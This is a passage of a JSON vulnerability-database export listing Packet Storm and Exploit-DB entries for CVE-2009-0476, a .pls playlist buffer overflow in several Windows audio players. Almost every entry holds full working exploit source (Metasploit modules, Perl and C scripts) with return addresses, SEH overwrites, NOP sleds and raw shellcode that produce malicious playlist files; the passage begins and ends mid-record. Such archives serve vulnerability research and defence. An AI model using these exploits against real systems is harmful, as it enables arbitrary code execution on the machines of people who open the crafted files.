rsaadjd.tmp \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jan 09 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']), \n], self.class) \n \nend \n \ndef exploit \n \nsploit = rand_text_alpha_upper(1308) \nsploit << generate_seh_payload(target.ret) \nsploit << rand_text_alpha_upper(8000) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \n \nfile_create(sploit) \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/85991/audiotran_pls.rb.txt"}, {"lastseen": "2016-12-05T22:12:29", "description": "", "published": "2009-12-31T00:00:00", "type": "packetstorm", "title": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2009-12-31T00:00:00", "id": "PACKETSTORM:84553", "href": "https://packetstormsecurity.com/files/84553/Audio-Workstation-6.4.2.4.3-pls-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. \nWhen opening a malicious pls file with the Audio Workstation, \na remote attacker could overflow a buffer and execute \narbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'germaya_x', 'dookie', ], \n'Version' => '$Revision: 7828 $', \n'References' => \n[ \n[ 'CVE', '2009-0476' ], \n[ 'OSVDB', '55424' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/10353' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Payload' => \n{ \n'Space' => 4100, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n'EncoderType' => Msf::Encoder::Type::AlphanumUpper, \n'DisableNops' => 'True', \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll \n], \n'Privileged' => false, \n'DisclosureDate' => 'Dec 08 2009', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']), \n], self.class) \n \nend \n \ndef exploit \n \nsploit = rand_text_alpha_upper(1308) \nsploit << \"\\xeb\\x16\\x90\\x90\" \nsploit << [target.ret].pack('V') \nsploit << make_nops(32) \nsploit << payload.encoded \nsploit << rand_text_alpha_upper(4652 - payload.encoded.length) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(sploit) \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84553/audio_wkstn_pls.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-01T03:25:33", "description": "Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit. CVE-2009-0476. Local exploit for windows platform", "published": "2009-02-03T00:00:00", "type": "exploitdb", "title": "Euphonics Audio Player 1.0 - .pls Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2009-02-03T00:00:00", "id": "EDB-ID:7958", "href": "https://www.exploit-db.com/exploits/7958/", "sourceData": "#!/usr/bin/perl -w\r\n#-----------------------------------------------------------------------------\r\n# Author : h4ck3r#47\r\n# Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit\r\n# Tested in Windows Pro Sp3 (English)\r\n# Gr33tz to : str0ke , T.N.T:18 , AlpHaNiX , All arab4services.net and friends\r\n#-----------------------------------------------------------------------------\r\nmy $overflow = \"\\x41\" x 1324;\r\nmy $ret = \"\\x7B\\x46\\x86\\x7C\"; # jmp ESP from kernel32.dll in Windows pro Sp3\r\nmy $nop = \"\\x90\" x 100 ;\r\n\r\n# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/\r\nmy $shellcode =\r\n\"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x34\".\r\n\"\\x92\\x42\\x83\\x83\\xeb\\xfc\\xe2\\xf4\\xc8\\x7a\\x06\\x83\\x34\\x92\\xc9\\xc6\".\r\n\"\\x08\\x19\\x3e\\x86\\x4c\\x93\\xad\\x08\\x7b\\x8a\\xc9\\xdc\\x14\\x93\\xa9\\xca\".\r\n\"\\xbf\\xa6\\xc9\\x82\\xda\\xa3\\x82\\x1a\\x98\\x16\\x82\\xf7\\x33\\x53\\x88\\x8e\".\r\n\"\\x35\\x50\\xa9\\x77\\x0f\\xc6\\x66\\x87\\x41\\x77\\xc9\\xdc\\x10\\x93\\xa9\\xe5\".\r\n\"\\xbf\\x9e\\x09\\x08\\x6b\\x8e\\x43\\x68\\xbf\\x8e\\xc9\\x82\\xdf\\x1b\\x1e\\xa7\".\r\n\"\\x30\\x51\\x73\\x43\\x50\\x19\\x02\\xb3\\xb1\\x52\\x3a\\x8f\\xbf\\xd2\\x4e\\x08\".\r\n\"\\x44\\x8e\\xef\\x08\\x5c\\x9a\\xa9\\x8a\\xbf\\x12\\xf2\\x83\\x34\\x92\\xc9\\xeb\".\r\n\"\\x08\\xcd\\x73\\x75\\x54\\xc4\\xcb\\x7b\\xb7\\x52\\x39\\xd3\\x5c\\x62\\xc8\\x87\".\r\n\"\\x6b\\xfa\\xda\\x7d\\xbe\\x9c\\x15\\x7c\\xd3\\xf1\\x23\\xef\\x57\\xbc\\x27\\xfb\".\r\n\"\\x51\\x92\\x42\\x83\";\r\n\r\nmy $file=\"hx.pls\";\r\n\r\n$exploit = $overflow.$ret.$nop.$shellcode;\r\nopen(my $FILE, \">>$file\") or die \"Cannot open $file: $!\";\r\nprint $FILE $exploit ;\r\nclose($FILE);\r\nprint \"Done \\n\";\r\n\r\n# milw0rm.com [2009-02-03]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7958/"}, {"lastseen": "2016-02-01T04:27:17", "description": "Euphonics Audio Player 1.0 (.pls) Universal Local Buffer Overflow Exploit. CVE-2009-0476. Local exploit for windows platform", "published": "2009-02-04T00:00:00", "type": "exploitdb", "title": "Euphonics Audio Player 1.0 - .pls Universal Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2009-02-04T00:00:00", "id": "EDB-ID:7973", "href": "https://www.exploit-db.com/exploits/7973/", "sourceData": "#!/usr/bin/perl -w\n#-----------------------------------------------------------------------------\n# Author : Houssamix\n\n# Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit\n# Gr33tz to : str0ke , real-power.net , Legend-spy - stack \n\n# thx to h4ck3r#47 for the fisrt exploit http://milw0rm.com/exploits/7958\n# just the ret adress is changed for make the exploit universal\n\n#-----------------------------------------------------------------------------\nmy $overflow = \"\\x41\" x 1324;\nmy $ret = \"\\xCB\\xA3\\x0F\\x10\"; # jmp esp from AdjMmsEng.dll <= universal adress\nmy $nop = \"\\x90\" x 100 ;\n\n# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/\nmy $shellcode =\n\"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x34\".\n\"\\x92\\x42\\x83\\x83\\xeb\\xfc\\xe2\\xf4\\xc8\\x7a\\x06\\x83\\x34\\x92\\xc9\\xc6\".\n\"\\x08\\x19\\x3e\\x86\\x4c\\x93\\xad\\x08\\x7b\\x8a\\xc9\\xdc\\x14\\x93\\xa9\\xca\".\n\"\\xbf\\xa6\\xc9\\x82\\xda\\xa3\\x82\\x1a\\x98\\x16\\x82\\xf7\\x33\\x53\\x88\\x8e\".\n\"\\x35\\x50\\xa9\\x77\\x0f\\xc6\\x66\\x87\\x41\\x77\\xc9\\xdc\\x10\\x93\\xa9\\xe5\".\n\"\\xbf\\x9e\\x09\\x08\\x6b\\x8e\\x43\\x68\\xbf\\x8e\\xc9\\x82\\xdf\\x1b\\x1e\\xa7\".\n\"\\x30\\x51\\x73\\x43\\x50\\x19\\x02\\xb3\\xb1\\x52\\x3a\\x8f\\xbf\\xd2\\x4e\\x08\".\n\"\\x44\\x8e\\xef\\x08\\x5c\\x9a\\xa9\\x8a\\xbf\\x12\\xf2\\x83\\x34\\x92\\xc9\\xeb\".\n\"\\x08\\xcd\\x73\\x75\\x54\\xc4\\xcb\\x7b\\xb7\\x52\\x39\\xd3\\x5c\\x62\\xc8\\x87\".\n\"\\x6b\\xfa\\xda\\x7d\\xbe\\x9c\\x15\\x7c\\xd3\\xf1\\x23\\xef\\x57\\xbc\\x27\\xfb\".\n\"\\x51\\x92\\x42\\x83\";\n\nmy $file=\"hsmx.pls\";\n\n$exploit = $overflow.$ret.$nop.$shellcode;\nopen(my $FILE, \">>$file\") or die \"Cannot open $file: $!\";\nprint $FILE $exploit ;\nclose($FILE);\nprint \"Done \\n\";\n\n# milw0rm.com [2009-02-04]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7973/"}, {"lastseen": "2016-02-01T04:27:25", "description": "Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3). CVE-2009-0476. Local exploit for windows platform", "published": "2009-02-04T00:00:00", "type": "exploitdb", "title": "Euphonics Audio Player 1.0 - .pls Local Buffer Overflow Exploit xp/sp3", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2009-02-04T00:00:00", "id": "EDB-ID:7974", "href": "https://www.exploit-db.com/exploits/7974/", "sourceData": "#include <stdio.h>\n#include <windows.h>\n#include <string.h>\n#define overflow 1324\n#define NOP 0x90\n#define pls \"Eye.pls\"\n\nint main (int argc,char **argv)\n{\nchar winsp3[] = \"\\x7B\\x46\\x86\\x7C\";\nchar buffer[overflow];\nFILE *Player;\n\nunsigned char shellcode[] =\n\"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xec\"\n\"\\x96\\x7d\\xb2\\x83\\xeb\\xfc\\xe2\\xf4\\x10\\x7e\\x39\\xb2\\xec\\x96\\xf6\\xf7\"\n\"\\xd0\\x1d\\x01\\xb7\\x94\\x97\\x92\\x39\\xa3\\x8e\\xf6\\xed\\xcc\\x97\\x96\\xfb\"\n\"\\x67\\xa2\\xf6\\xb3\\x02\\xa7\\xbd\\x2b\\x40\\x12\\xbd\\xc6\\xeb\\x57\\xb7\\xbf\"\n\"\\xed\\x54\\x96\\x46\\xd7\\xc2\\x59\\xb6\\x99\\x73\\xf6\\xed\\xc8\\x97\\x96\\xd4\"\n\"\\x67\\x9a\\x36\\x39\\xb3\\x8a\\x7c\\x59\\x67\\x8a\\xf6\\xb3\\x07\\x1f\\x21\\x96\"\n\"\\xe8\\x55\\x4c\\x72\\x88\\x1d\\x3d\\x82\\x69\\x56\\x05\\xbe\\x67\\xd6\\x71\\x39\"\n\"\\x9c\\x8a\\xd0\\x39\\x84\\x9e\\x96\\xbb\\x67\\x16\\xcd\\xb2\\xec\\x96\\xf6\\xda\"\n\"\\xd0\\xc9\\x4c\\x44\\x8c\\xc0\\xf4\\x4a\\x6f\\x56\\x06\\xe2\\x84\\x66\\xf7\\xb6\"\n\"\\xb3\\xfe\\xe5\\x4c\\x66\\x98\\x2a\\x4d\\x0b\\xf5\\x1c\\xde\\x8f\\xb8\\x18\\xca\"\n\"\\x89\\x96\\x7d\\xb2\";\n\nprintf(\"\\n******************************************\");\nprintf(\"\\n* THIS BUG ORGINAL DISCOVER BY h4ck3r#47 *\");\nprintf(\"\\n* THIS BUG C0DED BY SINGLE EYE *\");\nprintf(\"\\n* SPECIAL THANKS TO STR0KE *\");\nprintf(\"\\n******************************************\");\nmemset(buffer,NOP,overflow);\nmemcpy(buffer,shellcode,sizeof(shellcode)-1);\nbuffer[overflow] = 0;\nPlayer = fopen(pls,\"w+\");\nfwrite(Player,sizeof(unsigned char),sizeof(buffer),Player);\nfclose(Player);\nprintf(\"\\n DOne Poc !!\");\nreturn 0;\n}\n\n// milw0rm.com [2009-02-04]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7974/"}, {"lastseen": "2016-02-01T20:57:35", "description": "MP3 Workstation Version 9.2.1.1.2 SEH exploit. CVE-2009-0476. Local exploit for windows platform", "published": "2010-09-15T00:00:00", "type": "exploitdb", "title": "MP3 Workstation 9.2.1.1.2 - SEH Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2010-09-15T00:00:00", "id": "EDB-ID:15013", "href": "https://www.exploit-db.com/exploits/15013/", "sourceData": "#MP3 Workstation Version 9.2.1.1.2 SEH exploit\r\n#Author Sanjeev Gupta san.gupta86[at]gmail.com\r\n#Download Vulnerable application from http://www.e-soft.co.uk/MP3%20Workstation.htm\r\n#Vulnerable version MP3 Workstation Version 9.2.1.1.2\r\n#Tested on XP SP2\r\n#Greets Puneet Jain\r\n\r\n\r\n\r\nmy $head = \"\\x5B\\x70\\x6C\\x61\\x79\\x6C\\x69\\x73\\x74\\x5D\\x0D\\x0A\\x46\\x69\\x6C\\x65\\x31\\x3D\";\r\nmy $fuck = \"\\x41\" x 1940;\r\nmy $nseh = \"\\xeb\\x06\\x90\\x90\"; # short jump\r\nmy $seh = pack('V',0x735275CB); #0x735275CB msvbvm60.dll p/p/r \r\n\r\nmy $slide = \"\\x90\" x 12;\r\nmy $code = \r\n\"\\xDB\\xDF\\xD9\\x74\\x24\\xF4\\x58\\x2B\\xC9\\xB1\\x33\\xBA\".\r\n\"\\x4C\\xA8\\x75\\x76\\x83\\xC0\\x04\\x31\\x50\\x13\\x03\\x1C\\xBB\\x97\\x83\\x60\".\r\n\"\\x53\\xDE\\x6C\\x98\\xA4\\x81\\xE5\\x7D\\x95\\x93\\x92\\xF6\\x84\\x23\\xD0\\x5A\".\r\n\"\\x25\\xCF\\xB4\\x4E\\xBE\\xBD\\x10\\x61\\x77\\x0B\\x47\\x4C\\x88\\xBD\\x47\\x02\".\r\n\"\\x4A\\xDF\\x3B\\x58\\x9F\\x3F\\x05\\x93\\xD2\\x3E\\x42\\xC9\\x1D\\x12\\x1B\\x86\".\r\n\"\\x8C\\x83\\x28\\xDA\\x0C\\xA5\\xFE\\x51\\x2C\\xDD\\x7B\\xA5\\xD9\\x57\\x85\\xF5\".\r\n\"\\x72\\xE3\\xCD\\xED\\xF9\\xAB\\xED\\x0C\\x2D\\xA8\\xD2\\x47\\x5A\\x1B\\xA0\\x56\".\r\n\"\\x8A\\x55\\x49\\x69\\xF2\\x3A\\x74\\x46\\xFF\\x43\\xB0\\x60\\xE0\\x31\\xCA\\x93\".\r\n\"\\x9D\\x41\\x09\\xEE\\x79\\xC7\\x8C\\x48\\x09\\x7F\\x75\\x69\\xDE\\xE6\\xFE\\x65\".\r\n\"\\xAB\\x6D\\x58\\x69\\x2A\\xA1\\xD2\\x95\\xA7\\x44\\x35\\x1C\\xF3\\x62\\x91\\x45\".\r\n\"\\xA7\\x0B\\x80\\x23\\x06\\x33\\xD2\\x8B\\xF7\\x91\\x98\\x39\\xE3\\xA0\\xC2\\x57\".\r\n\"\\xF2\\x21\\x79\\x1E\\xF4\\x39\\x82\\x30\\x9D\\x08\\x09\\xDF\\xDA\\x94\\xD8\\xA4\".\r\n\"\\x05\\x77\\xC9\\xD0\\xAD\\x2E\\x98\\x59\\xB0\\xD0\\x76\\x9D\\xCD\\x52\\x73\\x5D\".\r\n\"\\x2A\\x4A\\xF6\\x58\\x76\\xCC\\xEA\\x10\\xE7\\xB9\\x0C\\x87\\x08\\xE8\\x6E\\x46\".\r\n\"\\x9B\\x70\\x5F\\xED\\x1B\\x12\\x9F\";\r\n\r\nmy $buf = \"\\x90\" x 2805;\r\n\r\n\r\n\r\nmy $file = \"POC.pls\";\r\nopen ($File,\">$file\");\r\nprint $File $head.$fuck.$nseh.$seh.$slide.$code.$buf;\r\nclose($File);\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/15013/"}, {"lastseen": "2016-02-02T06:06:59", "description": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow. CVE-2009-0476. Local exploit for windows platform", "published": "2010-01-28T00:00:00", "type": "exploitdb", "title": "Audiotran 1.4.1 PLS File Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2010-01-28T00:00:00", "id": "EDB-ID:16626", "href": "https://www.exploit-db.com/exploits/16626/", "sourceData": "##\r\n# $Id: audiotran_pls.rb 8306 2010-01-28 21:04:01Z swtornio $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in Audiotran 1.4.1.\r\n\t\t\t\tAn attacker must send the file to victim and the victim must open the file.\r\n\t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\r\n\t\t\t\tPLS file within a browser, when the PLS extention is registered to Audiotran.\r\n\t\t\t\tThis functionality has not been tested in this module.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' \t =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Sebastien Duquette',\r\n\t\t\t\t\t'dookie',\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 8306 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0476'],\r\n\t\t\t\t\t[ 'OSVDB', '55424'],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/11079' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 6000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x3d\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows Universal', { 'Ret' => 0x10101A3E } ], #p/p/r in rsaadjd.tmp\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jan 09 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),\r\n\t\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tsploit = rand_text_alpha_upper(1308)\r\n\t\tsploit << generate_seh_payload(target.ret)\r\n\t\tsploit << rand_text_alpha_upper(8000)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n\t\tfile_create(sploit)\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16626/"}, {"lastseen": "2016-02-01T12:19:44", "description": "Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH). CVE-2009-0476. Local exploit for windows platform", "published": "2009-09-24T00:00:00", "type": "exploitdb", "title": "Audio Workstation.pls Local Buffer Overflow Exploit SEH", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2009-09-24T00:00:00", "id": "EDB-ID:10353", "href": "https://www.exploit-db.com/exploits/10353/", "sourceData": "#!/usr/bin/perl\r\n=gnk\r\n==============================================================================\r\n _ _ _ _ _ _ \r\n / \\ | | | | / \\ | | | |\r\n / _ \\ | | | | / _ \\ | |_| |\r\n / ___ \\ | |___ | |___ / ___ \\ | _ |\r\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\r\n \r\n==============================================================================\r\n Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)\r\n==============================================================================\r\n\t[�] Exploited by:.......[ germaya_x ].....................\r\n [�] Script:.............[ Audio Workstation ].....................\r\n [�] version:............[ 6.4.2.4.0 ]\r\n\t[�] Today:..............[ 24/09/2009 ].....................\r\n [�] platform............[ Windows ].....................\r\n [�] tested on:..........[ Windows XP SP2 ].....................\r\n [�] greetz:.............[ his0k4/D3v!LFUCK3R ].....................\r\n==============================================================================\r\n\r\n\r\n\t\r\n=cut\r\n##############################################################################\r\nmy $shellcode=\r\n\"\\x89\\xe1\\xd9\\xee\\xd9\\x71\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\".\r\n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\".\r\n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\".\r\n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\".\r\n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a\".\r\n\"\\x48\\x47\\x34\\x43\\x30\\x45\\x50\\x45\\x50\\x4c\\x4b\\x51\\x55\\x47\".\r\n\"\\x4c\\x4c\\x4b\\x43\\x4c\\x45\\x55\\x42\\x58\\x45\\x51\\x4a\\x4f\\x4c\".\r\n\"\\x4b\\x50\\x4f\\x45\\x48\\x4c\\x4b\\x51\\x4f\\x51\\x30\\x43\\x31\\x4a\".\r\n\"\\x4b\\x51\\x59\\x4c\\x4b\\x50\\x34\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x46\".\r\n\"\\x51\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4d\\x54\\x49\\x50\\x42\\x54\\x45\".\r\n\"\\x57\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x48\\x42\\x4a\\x4b\\x4c\".\r\n\"\\x34\\x47\\x4b\\x50\\x54\\x47\\x54\\x45\\x54\\x43\\x45\\x4b\\x55\\x4c\".\r\n\"\\x4b\\x51\\x4f\\x47\\x54\\x45\\x51\\x4a\\x4b\\x45\\x36\\x4c\\x4b\\x44\".\r\n\"\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x4c\".\r\n\"\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4c\\x49\\x51\\x4c\\x46\".\r\n\"\\x44\\x44\\x44\\x48\\x43\\x51\\x4f\\x50\\x31\\x4a\\x56\\x45\\x30\\x50\".\r\n\"\\x56\\x42\\x44\\x4c\\x4b\\x51\\x56\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44\".\r\n\"\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x43\\x58\\x45\".\r\n\"\\x58\\x4b\\x39\\x4a\\x58\\x4d\\x53\\x49\\x50\\x42\\x4a\\x50\\x50\\x43\".\r\n\"\\x58\\x4a\\x50\\x4d\\x5a\\x44\\x44\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b\".\r\n\"\\x4e\\x4c\\x4a\\x44\\x4e\\x50\\x57\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x43\".\r\n\"\\x51\\x42\\x4c\\x42\\x43\\x43\\x30\\x41\\x41\";\r\n###################################################################\r\nmy $bof=\"\\x41\" x 1320;\r\nmy $nsh=\"\\xEB\\x09\\x90\\x90\";# Short jmp\r\nmy $seh=\"\\x5D\\x38\\x82\\x7C\";# KERNEL32.DLL\r\nmy $nop=\"\\x90\" x 20;\r\n###################################################################\r\nopen(myfile,'>> germaya_x.pls');\r\nprint myfile $bof.$nsh.$seh.$nop.$shellcode;\r\n###################################################################", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/10353/"}, {"lastseen": "2016-02-01T13:37:44", "description": "Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow. CVE-2009-0476. Local exploit for windows platform", "published": "2010-01-10T00:00:00", "type": "exploitdb", "title": "Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2010-01-10T00:00:00", "id": "EDB-ID:11079", "href": "https://www.exploit-db.com/exploits/11079/", "sourceData": "#!/usr/bin/ruby\r\n#\r\n# Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow\r\n# Date : January 9th, 2010\r\n# Author : S\u00c3\u00a9bastien Duquette\r\n# Software Link : http://www.e-soft.co.uk/Audiotran.htm\r\n# Version : 1.4.1\r\n# OS : Windows\r\n# Tested on : XP SP2/SP3 En (VMware)\r\n# Type of vuln : Stack Overflow / SEH\r\n# Greetz to : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me\r\n#\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n#\r\n#\r\n#\r\n\r\nbanner =\r\n\"|------------------------------------------------------------------|\\n\" +\r\n\"| __ __ |\\n\" +\r\n\"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\" +\r\n\"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\" +\r\n\"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\" +\r\n\"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\" +\r\n\"| |\\n\" +\r\n\"| http://www.corelan.be:8800 |\\n\" +\r\n\"| |\\n\" +\r\n\"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\"\r\n\r\n# Corelan Team MsgBox\r\npayload =\r\n\"\\xeb\\x22\\x56\\x31\\xc0\\x64\\x8b\\x40\\x30\\x85\\xc0\\x78\" +\r\n\"\\x0c\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\xeb\" +\r\n\"\\x09\\x8b\\x40\\x34\\x8d\\x40\\x7c\\x8b\\x40\\x3c\\x5e\\xc3\" +\r\n\"\\xeb\\x69\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\\x3c\\x8b\\x54\" +\r\n\"\\x05\\x78\\x01\\xea\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\" +\r\n\"\\xe3\\x34\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xff\\x31\\xc0\" +\r\n\"\\xfc\\xac\\x84\\xc0\\x74\\x07\\xc1\\xcf\\x0d\\x01\\xc7\\xeb\" +\r\n\"\\xf4\\x3b\\x7c\\x24\\x28\\x75\\xe1\\x8b\\x5a\\x24\\x01\\xeb\" +\r\n\"\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\" +\r\n\"\\x01\\xe8\\x89\\x44\\x24\\x1c\\x61\\xc3\\xad\\x50\\x52\\xe8\" +\r\n\"\\xaa\\xff\\xff\\xff\\x89\\x07\\x44\\x44\\x44\\x44\\x44\\x44\" +\r\n\"\\x44\\x44\\x47\\x47\\x47\\x47\\x39\\xce\\x75\\xe6\\xc3\\x4c\" +\r\n\"\\x4c\\x4c\\x4c\\x89\\xe5\\xe8\\x68\\xff\\xff\\xff\\x89\\xc2\" +\r\n\"\\xeb\\x1c\\x5e\\x8d\\x7d\\x04\\x89\\xf1\\x80\\xc1\\x0c\\xe8\" +\r\n\"\\xc8\\xff\\xff\\xff\\xeb\\x15\\x31\\xd2\\x59\\x88\\x51\\x36\" 